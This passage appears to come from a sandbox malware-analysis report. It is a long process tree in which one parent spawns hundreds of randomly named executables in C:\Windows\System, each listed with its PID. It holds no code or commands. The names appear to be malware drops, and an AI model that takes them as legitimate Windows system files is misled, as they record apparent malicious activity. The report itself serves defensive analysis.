  C:\Windows\System\IrmfVjn.exe
  2⤵
  PID:7764
- C:\Windows\System\TXrfBaJ.exe
  C:\Windows\System\TXrfBaJ.exe
  2⤵
  PID:7792
- C:\Windows\System\gJktgWp.exe
  C:\Windows\System\gJktgWp.exe
  2⤵
  PID:7820
- C:\Windows\System\NDRIkoV.exe
  C:\Windows\System\NDRIkoV.exe
  2⤵
  PID:7836
- C:\Windows\System\MoOEaYw.exe
  C:\Windows\System\MoOEaYw.exe
  2⤵
  PID:7876
- C:\Windows\System\elsOCRa.exe
  C:\Windows\System\elsOCRa.exe
  2⤵
  PID:7904
- C:\Windows\System\fXRYaaT.exe
  C:\Windows\System\fXRYaaT.exe
  2⤵
  PID:7936
- C:\Windows\System\CbMJxNa.exe
  C:\Windows\System\CbMJxNa.exe
  2⤵
  PID:7976
- C:\Windows\System\pQBikDM.exe
  C:\Windows\System\pQBikDM.exe
  2⤵
  PID:8000
- C:\Windows\System\aGkjySv.exe
  C:\Windows\System\aGkjySv.exe
  2⤵
  PID:8032
- C:\Windows\System\cHxcTZj.exe
  C:\Windows\System\cHxcTZj.exe
  2⤵
  PID:8068
- C:\Windows\System\FuvIixg.exe
  C:\Windows\System\FuvIixg.exe
  2⤵
  PID:8108
- C:\Windows\System\mCdOLKr.exe
  C:\Windows\System\mCdOLKr.exe
  2⤵
  PID:8132
- C:\Windows\System\uVSHngS.exe
  C:\Windows\System\uVSHngS.exe
  2⤵
  PID:8172
- C:\Windows\System\YISDZzq.exe
  C:\Windows\System\YISDZzq.exe
  2⤵
  PID:7104
- C:\Windows\System\aoLJEQu.exe
  C:\Windows\System\aoLJEQu.exe
  2⤵
  PID:7196
- C:\Windows\System\qIUwhqM.exe
  C:\Windows\System\qIUwhqM.exe
  2⤵
  PID:7232
- C:\Windows\System\hyPuoPt.exe
  C:\Windows\System\hyPuoPt.exe
  2⤵
  PID:7436
- C:\Windows\System\HRTdiCd.exe
  C:\Windows\System\HRTdiCd.exe
  2⤵
  PID:7528
- C:\Windows\System\DWjtpck.exe
  C:\Windows\System\DWjtpck.exe
  2⤵
  PID:7612
- C:\Windows\System\jycrZwN.exe
  C:\Windows\System\jycrZwN.exe
  2⤵
  PID:7632
- C:\Windows\System\xOOhrRW.exe
  C:\Windows\System\xOOhrRW.exe
  2⤵
  PID:7716
- C:\Windows\System\BPaWjCw.exe
  C:\Windows\System\BPaWjCw.exe
  2⤵
  PID:7816
- C:\Windows\System\olgovoS.exe
  C:\Windows\System\olgovoS.exe
  2⤵
  PID:7864
- C:\Windows\System\UoGFEuj.exe
  C:\Windows\System\UoGFEuj.exe
  2⤵
  PID:7992
- C:\Windows\System\rXdOTsN.exe
  C:\Windows\System\rXdOTsN.exe
  2⤵
  PID:8076
- C:\Windows\System\cWrGFOr.exe
  C:\Windows\System\cWrGFOr.exe
  2⤵
  PID:8168
- C:\Windows\System\MwQkJLr.exe
  C:\Windows\System\MwQkJLr.exe
  2⤵
  PID:7284
- C:\Windows\System\CCgFcOW.exe
  C:\Windows\System\CCgFcOW.exe
  2⤵
  PID:7380
- C:\Windows\System\HVDtutE.exe
  C:\Windows\System\HVDtutE.exe
  2⤵
  PID:7628
- C:\Windows\System\RozbcMP.exe
  C:\Windows\System\RozbcMP.exe
  2⤵
  PID:7676
- C:\Windows\System\oTbqFEc.exe
  C:\Windows\System\oTbqFEc.exe
  2⤵
  PID:7924
- C:\Windows\System\vmNHMfc.exe
  C:\Windows\System\vmNHMfc.exe
  2⤵
  PID:8164
- C:\Windows\System\qxfbCoO.exe
  C:\Windows\System\qxfbCoO.exe
  2⤵
  PID:7652
- C:\Windows\System\lIQFAkW.exe
  C:\Windows\System\lIQFAkW.exe
  2⤵
  PID:8156
- C:\Windows\System\vwtENfC.exe
  C:\Windows\System\vwtENfC.exe
  2⤵
  PID:8200
- C:\Windows\System\DcRWMNY.exe
  C:\Windows\System\DcRWMNY.exe
  2⤵
  PID:8216
- C:\Windows\System\JWglpXA.exe
  C:\Windows\System\JWglpXA.exe
  2⤵
  PID:8244
- C:\Windows\System\ZXiRMpv.exe
  C:\Windows\System\ZXiRMpv.exe
  2⤵
  PID:8284
- C:\Windows\System\kvakcAo.exe
  C:\Windows\System\kvakcAo.exe
  2⤵
  PID:8312
- C:\Windows\System\dKiNcpE.exe
  C:\Windows\System\dKiNcpE.exe
  2⤵
  PID:8328
- C:\Windows\System\ghFGRGZ.exe
  C:\Windows\System\ghFGRGZ.exe
  2⤵
  PID:8368
- C:\Windows\System\fktQPik.exe
  C:\Windows\System\fktQPik.exe
  2⤵
  PID:8404
- C:\Windows\System\CyosLTZ.exe
  C:\Windows\System\CyosLTZ.exe
  2⤵
  PID:8420
- C:\Windows\System\MoLfTqt.exe
  C:\Windows\System\MoLfTqt.exe
  2⤵
  PID:8448
- C:\Windows\System\CNFrvBB.exe
  C:\Windows\System\CNFrvBB.exe
  2⤵
  PID:8492
- C:\Windows\System\bpbAgbr.exe
  C:\Windows\System\bpbAgbr.exe
  2⤵
  PID:8520
- C:\Windows\System\DwVyoNL.exe
  C:\Windows\System\DwVyoNL.exe
  2⤵
  PID:8536
- C:\Windows\System\wpiywiK.exe
  C:\Windows\System\wpiywiK.exe
  2⤵
  PID:8564
- C:\Windows\System\lDiIrjE.exe
  C:\Windows\System\lDiIrjE.exe
  2⤵
  PID:8604
- C:\Windows\System\UYlEOnj.exe
  C:\Windows\System\UYlEOnj.exe
  2⤵
  PID:8628
- C:\Windows\System\DZOLJRE.exe
  C:\Windows\System\DZOLJRE.exe
  2⤵
  PID:8652
- C:\Windows\System\sEbaaOH.exe
  C:\Windows\System\sEbaaOH.exe
  2⤵
  PID:8692
- C:\Windows\System\rXUqAkd.exe
  C:\Windows\System\rXUqAkd.exe
  2⤵
  PID:8720
- C:\Windows\System\VnSAsdl.exe
  C:\Windows\System\VnSAsdl.exe
  2⤵
  PID:8752
- C:\Windows\System\BuVXApV.exe
  C:\Windows\System\BuVXApV.exe
  2⤵
  PID:8788
- C:\Windows\System\aQxcWRj.exe
  C:\Windows\System\aQxcWRj.exe
  2⤵
  PID:8824
- C:\Windows\System\iJRYfaD.exe
  C:\Windows\System\iJRYfaD.exe
  2⤵
  PID:8852
- C:\Windows\System\ZBCkbSp.exe
  C:\Windows\System\ZBCkbSp.exe
  2⤵
  PID:8888
- C:\Windows\System\ZGPOaxe.exe
  C:\Windows\System\ZGPOaxe.exe
  2⤵
  PID:8908
- C:\Windows\System\rYvMfNr.exe
  C:\Windows\System\rYvMfNr.exe
  2⤵
  PID:8936
- C:\Windows\System\vwQCuhn.exe
  C:\Windows\System\vwQCuhn.exe
  2⤵
  PID:8968
- C:\Windows\System\mntkqFU.exe
  C:\Windows\System\mntkqFU.exe
  2⤵
  PID:9008
- C:\Windows\System\zVkFWrj.exe
  C:\Windows\System\zVkFWrj.exe
  2⤵
  PID:9056
- C:\Windows\System\KXEhXto.exe
  C:\Windows\System\KXEhXto.exe
  2⤵
  PID:9072
- C:\Windows\System\FqaEIHI.exe
  C:\Windows\System\FqaEIHI.exe
  2⤵
  PID:9112
- C:\Windows\System\StDQYrv.exe
  C:\Windows\System\StDQYrv.exe
  2⤵
  PID:9140
- C:\Windows\System\MlkczbN.exe
  C:\Windows\System\MlkczbN.exe
  2⤵
  PID:9160
- C:\Windows\System\nAULpcq.exe
  C:\Windows\System\nAULpcq.exe
  2⤵
  PID:9196
- C:\Windows\System\mRpJmHl.exe
  C:\Windows\System\mRpJmHl.exe
  2⤵
  PID:7832
- C:\Windows\System\LrHPfiQ.exe
  C:\Windows\System\LrHPfiQ.exe
  2⤵
  PID:8228
- C:\Windows\System\yZpemVs.exe
  C:\Windows\System\yZpemVs.exe
  2⤵
  PID:8308
- C:\Windows\System\RRvAleI.exe
  C:\Windows\System\RRvAleI.exe
  2⤵
  PID:8344
- C:\Windows\System\IIHHqAF.exe
  C:\Windows\System\IIHHqAF.exe
  2⤵
  PID:8444
- C:\Windows\System\BZPruva.exe
  C:\Windows\System\BZPruva.exe
  2⤵
  PID:8544
- C:\Windows\System\WtCEaNk.exe
  C:\Windows\System\WtCEaNk.exe
  2⤵
  PID:8588
- C:\Windows\System\dbyOGyq.exe
  C:\Windows\System\dbyOGyq.exe
  2⤵
  PID:8644
- C:\Windows\System\WFNtuoV.exe
  C:\Windows\System\WFNtuoV.exe
  2⤵
  PID:8716
- C:\Windows\System\ZaGvXJP.exe
  C:\Windows\System\ZaGvXJP.exe
  2⤵
  PID:7432
- C:\Windows\System\fEUiGhK.exe
  C:\Windows\System\fEUiGhK.exe
  2⤵
  PID:8844
- C:\Windows\System\Alihxfu.exe
  C:\Windows\System\Alihxfu.exe
  2⤵
  PID:8916
- C:\Windows\System\sxDJpSF.exe
  C:\Windows\System\sxDJpSF.exe
  2⤵
  PID:8992
- C:\Windows\System\bmbUZHZ.exe
  C:\Windows\System\bmbUZHZ.exe
  2⤵
  PID:9068
- C:\Windows\System\NudlGtd.exe
  C:\Windows\System\NudlGtd.exe
  2⤵
  PID:9108
- C:\Windows\System\JTQxvoc.exe
  C:\Windows\System\JTQxvoc.exe
  2⤵
  PID:9208
- C:\Windows\System\IVZyRBD.exe
  C:\Windows\System\IVZyRBD.exe
  2⤵
  PID:8276
- C:\Windows\System\kGCrngM.exe
  C:\Windows\System\kGCrngM.exe
  2⤵
  PID:8360
- C:\Windows\System\DrvRzTG.exe
  C:\Windows\System\DrvRzTG.exe
  2⤵
  PID:8512
- C:\Windows\System\GkysndB.exe
  C:\Windows\System\GkysndB.exe
  2⤵
  PID:8648
- C:\Windows\System\baXKqOQ.exe
  C:\Windows\System\baXKqOQ.exe
  2⤵
  PID:8840
- C:\Windows\System\qzuuOjT.exe
  C:\Windows\System\qzuuOjT.exe
  2⤵
  PID:4696
- C:\Windows\System\xciiXCg.exe
  C:\Windows\System\xciiXCg.exe
  2⤵
  PID:9104
- C:\Windows\System\hEdVXiU.exe
  C:\Windows\System\hEdVXiU.exe
  2⤵
  PID:8320
- C:\Windows\System\LISamFS.exe
  C:\Windows\System\LISamFS.exe
  2⤵
  PID:8740
- C:\Windows\System\HcQwRGi.exe
  C:\Windows\System\HcQwRGi.exe
  2⤵
  PID:9040
- C:\Windows\System\ePchIAu.exe
  C:\Windows\System\ePchIAu.exe
  2⤵
  PID:8212
- C:\Windows\System\cLetTal.exe
  C:\Windows\System\cLetTal.exe
  2⤵
  PID:9064
- C:\Windows\System\UOViPDF.exe
  C:\Windows\System\UOViPDF.exe
  2⤵
  PID:9232
- C:\Windows\System\aAFowjG.exe
  C:\Windows\System\aAFowjG.exe
  2⤵
  PID:9248
- C:\Windows\System\ExOWLGm.exe
  C:\Windows\System\ExOWLGm.exe
  2⤵
  PID:9288
- C:\Windows\System\YAIZvWA.exe
  C:\Windows\System\YAIZvWA.exe
  2⤵
  PID:9316
- C:\Windows\System\IfAmBbH.exe
  C:\Windows\System\IfAmBbH.exe
  2⤵
  PID:9344
- C:\Windows\System\dQidKXD.exe
  C:\Windows\System\dQidKXD.exe
  2⤵
  PID:9372
- C:\Windows\System\YgUJZNY.exe
  C:\Windows\System\YgUJZNY.exe
  2⤵
  PID:9400
- C:\Windows\System\SGwCful.exe
  C:\Windows\System\SGwCful.exe
  2⤵
  PID:9420
- C:\Windows\System\VOqWJBt.exe
  C:\Windows\System\VOqWJBt.exe
  2⤵
  PID:9448
- C:\Windows\System\VfqMAjj.exe
  C:\Windows\System\VfqMAjj.exe
  2⤵
  PID:9472
- C:\Windows\System\vtZsLHt.exe
  C:\Windows\System\vtZsLHt.exe
  2⤵
  PID:9512
- C:\Windows\System\MCcIMVV.exe
  C:\Windows\System\MCcIMVV.exe
  2⤵
  PID:9528
- C:\Windows\System\sDAcBSx.exe
  C:\Windows\System\sDAcBSx.exe
  2⤵
  PID:9560
- C:\Windows\System\OqDfBlS.exe
  C:\Windows\System\OqDfBlS.exe
  2⤵
  PID:9596
- C:\Windows\System\NhdlnRw.exe
  C:\Windows\System\NhdlnRw.exe
  2⤵
  PID:9624
- C:\Windows\System\KnjENlg.exe
  C:\Windows\System\KnjENlg.exe
  2⤵
  PID:9656
- C:\Windows\System\pgGpmJN.exe
  C:\Windows\System\pgGpmJN.exe
  2⤵
  PID:9684
- C:\Windows\System\DoreZUF.exe
  C:\Windows\System\DoreZUF.exe
  2⤵
  PID:9712
- C:\Windows\System\SwnOxQj.exe
  C:\Windows\System\SwnOxQj.exe
  2⤵
  PID:9752
- C:\Windows\System\kMkcXGo.exe
  C:\Windows\System\kMkcXGo.exe
  2⤵
  PID:9780
- C:\Windows\System\VTqAnpV.exe
  C:\Windows\System\VTqAnpV.exe
  2⤵
  PID:9808
- C:\Windows\System\obouZtY.exe
  C:\Windows\System\obouZtY.exe
  2⤵
  PID:9836
- C:\Windows\System\TwhkoII.exe
  C:\Windows\System\TwhkoII.exe
  2⤵
  PID:9864
- C:\Windows\System\NrgxEvF.exe
  C:\Windows\System\NrgxEvF.exe
  2⤵
  PID:9892
- C:\Windows\System\xUjfuho.exe
  C:\Windows\System\xUjfuho.exe
  2⤵
  PID:9912
- C:\Windows\System\YggCeJS.exe
  C:\Windows\System\YggCeJS.exe
  2⤵
  PID:9936
- C:\Windows\System\eqtCkuG.exe
  C:\Windows\System\eqtCkuG.exe
  2⤵
  PID:9956
- C:\Windows\System\mIaKzkq.exe
  C:\Windows\System\mIaKzkq.exe
  2⤵
  PID:9988
- C:\Windows\System\gafJdUL.exe
  C:\Windows\System\gafJdUL.exe
  2⤵
  PID:10024
- C:\Windows\System\ayfgNzk.exe
  C:\Windows\System\ayfgNzk.exe
  2⤵
  PID:10048
- C:\Windows\System\qXsCkJd.exe
  C:\Windows\System\qXsCkJd.exe
  2⤵
  PID:10064
- C:\Windows\System\LofgTyE.exe
  C:\Windows\System\LofgTyE.exe
  2⤵
  PID:10156
- C:\Windows\System\YEExnVz.exe
  C:\Windows\System\YEExnVz.exe
  2⤵
  PID:10184
- C:\Windows\System\BoVUzCB.exe
  C:\Windows\System\BoVUzCB.exe
  2⤵
  PID:10228
- C:\Windows\System\fUpOTqW.exe
  C:\Windows\System\fUpOTqW.exe
  2⤵
  PID:9228
- C:\Windows\System\jgVBDKT.exe
  C:\Windows\System\jgVBDKT.exe
  2⤵
  PID:9276
- C:\Windows\System\FijzucK.exe
  C:\Windows\System\FijzucK.exe
  2⤵
  PID:9336
- C:\Windows\System\PQJFGyb.exe
  C:\Windows\System\PQJFGyb.exe
  2⤵
  PID:9408
- C:\Windows\System\RVlIXZD.exe
  C:\Windows\System\RVlIXZD.exe
  2⤵
  PID:9464
- C:\Windows\System\ogGMzDu.exe
  C:\Windows\System\ogGMzDu.exe
  2⤵
  PID:9500
- C:\Windows\System\fhGIyAj.exe
  C:\Windows\System\fhGIyAj.exe
  2⤵
  PID:9580
- C:\Windows\System\XlfRRLe.exe
  C:\Windows\System\XlfRRLe.exe
  2⤵
  PID:9644
- C:\Windows\System\yoJpcrv.exe
  C:\Windows\System\yoJpcrv.exe
  2⤵
  PID:9704
- C:\Windows\System\BSHCYjC.exe
  C:\Windows\System\BSHCYjC.exe
  2⤵
  PID:9792
- C:\Windows\System\ilxlbQz.exe
  C:\Windows\System\ilxlbQz.exe
  2⤵
  PID:9860
- C:\Windows\System\mpLtbin.exe
  C:\Windows\System\mpLtbin.exe
  2⤵
  PID:9920
- C:\Windows\System\qLkbbMf.exe
  C:\Windows\System\qLkbbMf.exe
  2⤵
  PID:10040
- C:\Windows\System\KTREKIT.exe
  C:\Windows\System\KTREKIT.exe
  2⤵
  PID:10020
- C:\Windows\System\wbacOvS.exe
  C:\Windows\System\wbacOvS.exe
  2⤵
  PID:10172
- C:\Windows\System\UGXjDNO.exe
  C:\Windows\System\UGXjDNO.exe
  2⤵
  PID:9224
- C:\Windows\System\NfKTdsN.exe
  C:\Windows\System\NfKTdsN.exe
  2⤵
  PID:4592
- C:\Windows\System\vLyjQdE.exe
  C:\Windows\System\vLyjQdE.exe
  2⤵
  PID:9368
- C:\Windows\System\yFGlZof.exe
  C:\Windows\System\yFGlZof.exe
  2⤵
  PID:9460
- C:\Windows\System\ujfxeeu.exe
  C:\Windows\System\ujfxeeu.exe
  2⤵
  PID:9604
- C:\Windows\System\cgoVHwb.exe
  C:\Windows\System\cgoVHwb.exe
  2⤵
  PID:9796
- C:\Windows\System\ztpUYfA.exe
  C:\Windows\System\ztpUYfA.exe
  2⤵
  PID:9856
- C:\Windows\System\NjSFddc.exe
  C:\Windows\System\NjSFddc.exe
  2⤵
  PID:10016
- C:\Windows\System\qAzjrdI.exe
  C:\Windows\System\qAzjrdI.exe
  2⤵
  PID:10208
- C:\Windows\System\CwKDKUY.exe
  C:\Windows\System\CwKDKUY.exe
  2⤵
  PID:8924
- C:\Windows\System\gaHxNXn.exe
  C:\Windows\System\gaHxNXn.exe
  2⤵
  PID:9768
- C:\Windows\System\HxRcoLE.exe
  C:\Windows\System\HxRcoLE.exe
  2⤵
  PID:9976
- C:\Windows\System\SCGXrgz.exe
  C:\Windows\System\SCGXrgz.exe
  2⤵
  PID:9556
- C:\Windows\System\aaEggtk.exe
  C:\Windows\System\aaEggtk.exe
  2⤵
  PID:9308
- C:\Windows\System\lZPKgFg.exe
  C:\Windows\System\lZPKgFg.exe
  2⤵
  PID:60
- C:\Windows\System\ciXtcIZ.exe
  C:\Windows\System\ciXtcIZ.exe
  2⤵
  PID:10260
- C:\Windows\System\QGUUDKb.exe
  C:\Windows\System\QGUUDKb.exe
  2⤵
  PID:10308
- C:\Windows\System\JGnnCYd.exe
  C:\Windows\System\JGnnCYd.exe
  2⤵
  PID:10336
- C:\Windows\System\nHOcFQs.exe
  C:\Windows\System\nHOcFQs.exe
  2⤵
  PID:10360
- C:\Windows\System\UcQMCef.exe
  C:\Windows\System\UcQMCef.exe
  2⤵
  PID:10380
- C:\Windows\System\MmTnicG.exe
  C:\Windows\System\MmTnicG.exe
  2⤵
  PID:10420
- C:\Windows\System\ZwsbBmJ.exe
  C:\Windows\System\ZwsbBmJ.exe
  2⤵
  PID:10448
- C:\Windows\System\PDcBUrU.exe
  C:\Windows\System\PDcBUrU.exe
  2⤵
  PID:10476
- C:\Windows\System\znyDFuJ.exe
  C:\Windows\System\znyDFuJ.exe
  2⤵
  PID:10492
- C:\Windows\System\Yxutlxn.exe
  C:\Windows\System\Yxutlxn.exe
  2⤵
  PID:10532
- C:\Windows\System\jRLeyTP.exe
  C:\Windows\System\jRLeyTP.exe
  2⤵
  PID:10552
- C:\Windows\System\dXnrUsZ.exe
  C:\Windows\System\dXnrUsZ.exe
  2⤵
  PID:10580
- C:\Windows\System\WHocdhk.exe
  C:\Windows\System\WHocdhk.exe
  2⤵
  PID:10616
- C:\Windows\System\snZUAlH.exe
  C:\Windows\System\snZUAlH.exe
  2⤵
  PID:10644
- C:\Windows\System\JeYxzTh.exe
  C:\Windows\System\JeYxzTh.exe
  2⤵
  PID:10672
- C:\Windows\System\AmNAvDY.exe
  C:\Windows\System\AmNAvDY.exe
  2⤵
  PID:10700
- C:\Windows\System\mzYmJUy.exe
  C:\Windows\System\mzYmJUy.exe
  2⤵
  PID:10728
- C:\Windows\System\znXpPTE.exe
  C:\Windows\System\znXpPTE.exe
  2⤵
  PID:10756
- C:\Windows\System\tDlPOLr.exe
  C:\Windows\System\tDlPOLr.exe
  2⤵
  PID:10784
- C:\Windows\System\qcfukEX.exe
  C:\Windows\System\qcfukEX.exe
  2⤵
  PID:10812
- C:\Windows\System\jcoVgql.exe
  C:\Windows\System\jcoVgql.exe
  2⤵
  PID:10840
- C:\Windows\System\CEThoIx.exe
  C:\Windows\System\CEThoIx.exe
  2⤵
  PID:10868
- C:\Windows\System\yhrUEpT.exe
  C:\Windows\System\yhrUEpT.exe
  2⤵
  PID:10896
- C:\Windows\System\UGhlgxq.exe
  C:\Windows\System\UGhlgxq.exe
  2⤵
  PID:10924
- C:\Windows\System\RVwzcFL.exe
  C:\Windows\System\RVwzcFL.exe
  2⤵
  PID:10952
- C:\Windows\System\lWJNpGj.exe
  C:\Windows\System\lWJNpGj.exe
  2⤵
  PID:10976
- C:\Windows\System\eXvDwxN.exe
  C:\Windows\System\eXvDwxN.exe
  2⤵
  PID:10996
- C:\Windows\System\DGEcYUR.exe
  C:\Windows\System\DGEcYUR.exe
  2⤵
  PID:11032
- C:\Windows\System\qyyPpKZ.exe
  C:\Windows\System\qyyPpKZ.exe
  2⤵
  PID:11052
- C:\Windows\System\uWtJeUX.exe
  C:\Windows\System\uWtJeUX.exe
  2⤵
  PID:11088
- C:\Windows\System\XYgkVNz.exe
  C:\Windows\System\XYgkVNz.exe
  2⤵
  PID:11124
- C:\Windows\System\cSbOtOX.exe
  C:\Windows\System\cSbOtOX.exe
  2⤵
  PID:11152
- C:\Windows\System\wapqmEw.exe
  C:\Windows\System\wapqmEw.exe
  2⤵
  PID:11180
- C:\Windows\System\yCRoqqw.exe
  C:\Windows\System\yCRoqqw.exe
  2⤵
  PID:11208
- C:\Windows\System\loOqNQr.exe
  C:\Windows\System\loOqNQr.exe
  2⤵
  PID:11232
- C:\Windows\System\pSMIZEO.exe
  C:\Windows\System\pSMIZEO.exe
  2⤵
  PID:11252
- C:\Windows\System\QtGrptq.exe
  C:\Windows\System\QtGrptq.exe
  2⤵
  PID:10296
- C:\Windows\System\iXwcyJR.exe
  C:\Windows\System\iXwcyJR.exe
  2⤵
  PID:10352
- C:\Windows\System\VRKCQoC.exe
  C:\Windows\System\VRKCQoC.exe
  2⤵
  PID:10396
- C:\Windows\System\zYFGDUP.exe
  C:\Windows\System\zYFGDUP.exe
  2⤵
  PID:10488
- C:\Windows\System\oVnwlBB.exe
  C:\Windows\System\oVnwlBB.exe
  2⤵
  PID:10564
- C:\Windows\System\YZHgobT.exe
  C:\Windows\System\YZHgobT.exe
  2⤵
  PID:432
- C:\Windows\System\FktgPcQ.exe
  C:\Windows\System\FktgPcQ.exe
  2⤵
  PID:10636
- C:\Windows\System\HpBWfNK.exe
  C:\Windows\System\HpBWfNK.exe
  2⤵
  PID:10724
- C:\Windows\System\pDJnysH.exe
  C:\Windows\System\pDJnysH.exe
  2⤵
  PID:10796
- C:\Windows\System\aJYlUqy.exe
  C:\Windows\System\aJYlUqy.exe
  2⤵
  PID:10852
- C:\Windows\System\qaCJREt.exe
  C:\Windows\System\qaCJREt.exe
  2⤵
  PID:10948
- C:\Windows\System\wHxVtDq.exe
  C:\Windows\System\wHxVtDq.exe
  2⤵
  PID:10960
- C:\Windows\System\WsInXQH.exe
  C:\Windows\System\WsInXQH.exe
  2⤵
  PID:11044
- C:\Windows\System\vxUOFgn.exe
  C:\Windows\System\vxUOFgn.exe
  2⤵
  PID:11120
- C:\Windows\System\GNtvxWT.exe
  C:\Windows\System\GNtvxWT.exe
  2⤵
  PID:11196
- C:\Windows\System\EyHIRnA.exe
  C:\Windows\System\EyHIRnA.exe
  2⤵
  PID:11248
- C:\Windows\System\MTiPXeC.exe
  C:\Windows\System\MTiPXeC.exe
  2⤵
  PID:10320
- C:\Windows\System\ApEOySb.exe
  C:\Windows\System\ApEOySb.exe
  2⤵
  PID:10468
- C:\Windows\System\exrmudU.exe
  C:\Windows\System\exrmudU.exe
  2⤵
  PID:10576
- C:\Windows\System\IvCbnlj.exe
  C:\Windows\System\IvCbnlj.exe
  2⤵
  PID:10696
- C:\Windows\System\RsJlkZF.exe
  C:\Windows\System\RsJlkZF.exe
  2⤵
  PID:10936
- C:\Windows\System\MfXkYAq.exe
  C:\Windows\System\MfXkYAq.exe
  2⤵
  PID:11084
- C:\Windows\System\PayqnNO.exe
  C:\Windows\System\PayqnNO.exe
  2⤵
  PID:10332
- C:\Windows\System\uehJzBq.exe
  C:\Windows\System\uehJzBq.exe
  2⤵
  PID:10544
- C:\Windows\System\yrQxzBT.exe
  C:\Windows\System\yrQxzBT.exe
  2⤵
  PID:10892
- C:\Windows\System\UMkYLJo.exe
  C:\Windows\System\UMkYLJo.exe
  2⤵
  PID:11276
- C:\Windows\System\oIvsjLz.exe
  C:\Windows\System\oIvsjLz.exe
  2⤵
  PID:11308
- C:\Windows\System\iclhOKm.exe
  C:\Windows\System\iclhOKm.exe
  2⤵
  PID:11336
- C:\Windows\System\hVTAlWa.exe
  C:\Windows\System\hVTAlWa.exe
  2⤵
  PID:11364
- C:\Windows\System\nAJgqaR.exe
  C:\Windows\System\nAJgqaR.exe
  2⤵
  PID:11380
- C:\Windows\System\BFkejJH.exe
  C:\Windows\System\BFkejJH.exe
  2⤵
  PID:11404
- C:\Windows\System\EBDnjbJ.exe
  C:\Windows\System\EBDnjbJ.exe
  2⤵
  PID:11428
- C:\Windows\System\zrFhBcH.exe
  C:\Windows\System\zrFhBcH.exe
  2⤵
  PID:11456
- C:\Windows\System\DZkbzIU.exe
  C:\Windows\System\DZkbzIU.exe
  2⤵
  PID:11472
- C:\Windows\System\QAPdqhu.exe
  C:\Windows\System\QAPdqhu.exe
  2⤵
  PID:11504
- C:\Windows\System\UBnuTMW.exe
  C:\Windows\System\UBnuTMW.exe
  2⤵
  PID:11528
- C:\Windows\System\HDwwQHW.exe
  C:\Windows\System\HDwwQHW.exe
  2⤵
  PID:11584
- C:\Windows\System\ZmpqRVw.exe
  C:\Windows\System\ZmpqRVw.exe
  2⤵
  PID:11624
- C:\Windows\System\qeNjOyI.exe
  C:\Windows\System\qeNjOyI.exe
  2⤵
  PID:11644
- C:\Windows\System\QPFtMpx.exe
  C:\Windows\System\QPFtMpx.exe
  2⤵
  PID:11672
- C:\Windows\System\XTBlLYN.exe
  C:\Windows\System\XTBlLYN.exe
  2⤵
  PID:11716
- C:\Windows\System\mOGAYhf.exe
  C:\Windows\System\mOGAYhf.exe
  2⤵
  PID:11760
- C:\Windows\System\CyNQutj.exe
  C:\Windows\System\CyNQutj.exe
  2⤵
  PID:11784
- C:\Windows\System\qaLLKsv.exe
  C:\Windows\System\qaLLKsv.exe
  2⤵
  PID:11804
- C:\Windows\System\tetjksP.exe
  C:\Windows\System\tetjksP.exe
  2⤵
  PID:11840
- C:\Windows\System\tmGEkPo.exe
  C:\Windows\System\tmGEkPo.exe
  2⤵
  PID:11872
- C:\Windows\System\DIwHNlz.exe
  C:\Windows\System\DIwHNlz.exe
  2⤵
  PID:11904
- C:\Windows\System\hXRndaZ.exe
  C:\Windows\System\hXRndaZ.exe
  2⤵
  PID:11932
- C:\Windows\System\tinnKSf.exe
  C:\Windows\System\tinnKSf.exe
  2⤵
  PID:11952
- C:\Windows\System\ArOrtaq.exe
  C:\Windows\System\ArOrtaq.exe
  2⤵
  PID:11976
- C:\Windows\System\rdwhjff.exe
  C:\Windows\System\rdwhjff.exe
  2⤵
  PID:12004
- C:\Windows\System\LLKjhCK.exe
  C:\Windows\System\LLKjhCK.exe
  2⤵
  PID:12044
- C:\Windows\System\IOQHXuG.exe
  C:\Windows\System\IOQHXuG.exe
  2⤵
  PID:12072
- C:\Windows\System\jjYgzTx.exe
  C:\Windows\System\jjYgzTx.exe
  2⤵
  PID:12100
- C:\Windows\System\juNPiMW.exe
  C:\Windows\System\juNPiMW.exe
  2⤵
  PID:12128
- C:\Windows\System\RgFKEUk.exe
  C:\Windows\System\RgFKEUk.exe
  2⤵
  PID:12156
- C:\Windows\System\bOezbUa.exe
  C:\Windows\System\bOezbUa.exe
  2⤵
  PID:12184
- C:\Windows\System\yXAFJRJ.exe
  C:\Windows\System\yXAFJRJ.exe
  2⤵
  PID:12208
- C:\Windows\System\hAGNyWG.exe
  C:\Windows\System\hAGNyWG.exe
  2⤵
  PID:12240
- C:\Windows\System\gZPuUJB.exe
  C:\Windows\System\gZPuUJB.exe
  2⤵
  PID:12268
- C:\Windows\System\qHRXBUk.exe
  C:\Windows\System\qHRXBUk.exe
  2⤵
  PID:10768
- C:\Windows\System\ggkkNfo.exe
  C:\Windows\System\ggkkNfo.exe
  2⤵
  PID:11304
- C:\Windows\System\gBMwgky.exe
  C:\Windows\System\gBMwgky.exe
  2⤵
  PID:11376
- C:\Windows\System\lQezOwJ.exe
  C:\Windows\System\lQezOwJ.exe
  2⤵
  PID:11424
- C:\Windows\System\LsVQdIV.exe
  C:\Windows\System\LsVQdIV.exe
  2⤵
  PID:11496
- C:\Windows\System\ljwZZHe.exe
  C:\Windows\System\ljwZZHe.exe
  2⤵
  PID:11592
- C:\Windows\System\KkHfQzu.exe
  C:\Windows\System\KkHfQzu.exe
  2⤵
  PID:11696
- C:\Windows\System\ycNeZvG.exe
  C:\Windows\System\ycNeZvG.exe
  2⤵
  PID:11740
- C:\Windows\System\HoWFEnQ.exe
  C:\Windows\System\HoWFEnQ.exe
  2⤵
  PID:11792
- C:\Windows\System\uQRnOFU.exe
  C:\Windows\System\uQRnOFU.exe
  2⤵
  PID:11848
- C:\Windows\System\RaeWYlt.exe
  C:\Windows\System\RaeWYlt.exe
  2⤵
  PID:11924
- C:\Windows\System\buzCQQP.exe
  C:\Windows\System\buzCQQP.exe
  2⤵
  PID:11996
- C:\Windows\System\siucvuq.exe
  C:\Windows\System\siucvuq.exe
  2⤵
  PID:12064
- C:\Windows\System\VLWcTpT.exe
  C:\Windows\System\VLWcTpT.exe
  2⤵
  PID:12140
- C:\Windows\System\IEqmtBP.exe
  C:\Windows\System\IEqmtBP.exe
  2⤵
  PID:12204
- C:\Windows\System\dUyVCCw.exe
  C:\Windows\System\dUyVCCw.exe
  2⤵
  PID:12256
- C:\Windows\System\eNgOrWF.exe
  C:\Windows\System\eNgOrWF.exe
  2⤵
  PID:11396
- C:\Windows\System\wTBByEV.exe
  C:\Windows\System\wTBByEV.exe
  2⤵
  PID:11492
- C:\Windows\System\eRAqzgb.exe
  C:\Windows\System\eRAqzgb.exe
  2⤵
  PID:11640
